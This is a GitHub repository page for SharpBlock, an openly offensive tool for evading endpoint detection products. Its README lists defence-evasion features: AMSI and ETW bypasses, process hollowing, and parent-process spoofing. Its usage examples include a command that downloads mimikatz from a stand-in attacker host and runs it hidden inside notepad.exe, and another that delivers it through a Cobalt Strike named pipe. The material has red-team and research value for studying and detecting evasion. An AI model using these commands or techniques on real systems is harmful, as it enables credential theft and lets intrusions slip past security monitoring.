Skip to content
/ SharpBlock Public

A method of bypassing EDR's active projection DLL's by preventing entry point exection

1.1k stars 160 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

CCob/SharpBlock

2 Branches0 Tags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

CCobCCob
Changes to attempt support for legacy XP/2003 server
Mar 31, 2021
c7f6fcb · Mar 31, 2021

History

29 Commits
.github
.github
Aug 27, 2020
Properties
Properties
Jun 14, 2020
SharpSploit
SharpSploit
Mar 31, 2021
.gitattributes
.gitattributes
Jun 14, 2020
.gitignore
.gitignore
Jun 14, 2020
App.config
App.config
Mar 31, 2021
Context.cs
Context.cs
Mar 31, 2021
Context32.cs
Context32.cs
Mar 28, 2021
Context64.cs
Context64.cs
Mar 28, 2021
ContextFactory.cs
ContextFactory.cs
Oct 15, 2020
FodyWeavers.xml
FodyWeavers.xml
Aug 19, 2020
FodyWeavers.xsd
FodyWeavers.xsd
Aug 19, 2020
Options.cs
Options.cs
Jun 14, 2020
PE.cs
PE.cs
Aug 19, 2020
Program.cs
Program.cs
Mar 31, 2021
README.md
README.md
Mar 28, 2021
SharpBlock.csproj
SharpBlock.csproj
Mar 31, 2021
SharpBlock.sln
SharpBlock.sln
Oct 15, 2020
WinAPI.cs
WinAPI.cs
Mar 31, 2021
packages.config
packages.config
Aug 19, 2020
upload.cna
upload.cna
Aug 19, 2020

Repository files navigation

SharpBlock

A method of bypassing EDR's active projection DLL's by preventing entry point execution.

Features

  • Blocks EDR DLL entry point execution, which prevents EDR hooks from being placed.
  • Patchless AMSI bypass that is undetectable from scanners looking for Amsi.dll code patches at runtime.
  • Host process that is replaced with an implant PE that can be loaded from disk, HTTP or named pipe (Cobalt Strike)
  • Implanted process is hidden to help evade scanners looking for hollowed processes.
  • Command line args are spoofed and implanted after process creation using stealthy EDR detection method.
  • Patchless ETW bypass.
  • Blocks NtProtectVirtualMemory invocation when callee is within the range of a blocked DLL's address space
SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x64

  -e, --exe=VALUE            Program to execute (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -n, --name=VALUE           Name of DLL to block
  -c, --copyright=VALUE      Copyright string to block
  -p, --product=VALUE        Product string to block
  -d, --description=VALUE    Description string to block
  -s, --spawn=VALUE          Host process to spawn for swapping with the target exe
  -ppid=VALUE                Parent process ID for spawned child (PPID Spoofing)
  -w, --show                 Show the lauched process window instead of the
                               default hide
      --disable-bypass-amsi  Disable AMSI bypassAmsi
      --disable-bypass-cmdline
                             Disable command line bypass
      --disable-bypass-etw   Disable ETW bypass
      --disable-header-patch Disable process hollow detection bypass
  -h, --help                 Display this help

Examples

Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL

SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL

execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

Note, for the upload_file beacon command, load upload.cna into Cobalt Strike's Script Manager

Accompanying Blog Posts:

About

A method of bypassing EDR's active projection DLL's by preventing entry point exection

Resources

Readme
Activity

Stars

1.1k stars

Watchers

19 watching

Forks

160 forks
Report repository

Releases

No releases published

Sponsor this project

@CCob CCob Ceri Coburn
Sponsor
Learn more about GitHub Sponsors

Packages

No packages published

Languages